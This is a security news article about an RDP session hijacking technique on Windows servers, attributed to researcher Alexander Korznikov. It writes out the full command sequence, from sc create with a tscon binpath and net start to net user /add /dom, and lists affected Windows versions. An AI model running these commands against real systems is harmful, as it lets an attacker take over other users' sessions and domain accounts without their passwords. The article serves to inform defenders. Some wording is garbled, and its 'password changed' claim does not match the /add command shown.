Few days ago a video appeared on the web linking to a blog post on how to use an RDP Session to hijack an administrator account with few simple commands in Windows server that allow a creation of a service. What is interesting is that the finding is nothing new and has been existing since 2011, but nobody did nothing to fix it.
How Does It Work?
All that the attacker must have to hijack the server is access to the command prompt. From there, the attacker can check if the account belongs to the administrator by typing the command:
→ >whoami
After this, if the account of the server belongs to an administrator, the attacker can what is the domain related to the computer with the following command:
→ >wmic computersystem get domain
If the administrative user has an enabled password, the attacker will use the following command to get the SESSIONNAME of the current session with the server. The command is as follows:
→ >query user
After this, the attacker is presented a table with the state of the sessions (Active and Disconnected sessions), idle times, login times and the user names corresponding to them. From there, the attacker can take advantage of the SESSIONNAME which usually looks like the following – rdp-tcp#80. The hijacking process itself is done by the following command which is used to take over an active session:
→ >sc create sesshijack binpath= “cmd.exe /k tscon /dest:rdp-tcp#80”
(the rdp-tcp is the session name which is variable)
Then the net start command is used:
→ >net start sesshijack
And then the new session has started, this time from the administrator account, directly bypassing the need to enter administrative password. From there, on the new session when the >whoami command is typed, the user should be able to witness that now the account is administrative. From there, the password itself can be changed by typing the following command:
→ >net user nopernik {new password} /add /dom
At this point the password is changed and the net group command can be used to modify the domain administrators.
What is interesting is that the questionable hacker who is doing those, named Alexander Korznikov has also performed other session hijacking features on his YouTube channel and explained in his blog(https://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html) that this is active for even the newest Windows Server versions. Here are the versions in which this RDP hijacking sessions can occur:
- Windows 2008
- Windows 7
- Windows 2012 R2
- Windows 10
- Windows 2016
What Is the Real-Life Impact of This
In reality, the researcher explains that if someone has the access to the server can take advantage of various users on the server. These can be employees who are on a lunch break and have locked their computers temporarily. If there is a system for financial management, like PoS or other billing systems, the sysadmin can modify those and control them with commands that are usually pre-embedded. And what is worse that no malware is needed by the attacker, only simple commands for Windows. The researcher has also finally pointed out that this is only one scenario and there may be many many other scenarios where user profiles can be spied on and manipulated externally and the attack is very difficult to be detected.
Ventsislav Krastev
Ventsislav is a cybersecurity expert at SensorsTechForum since 2015. He has been researching, covering, helping victims with the latest malware infections plus testing and reviewing software and the newest tech developments. Having graduated Marketing as well, Ventsislav also has passion for learning new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management, Network Administration and Computer Administration of System Applications, he found his true calling within the cybersecrurity industry and is a strong believer in the education of every user towards online safety and security.
Follow Me: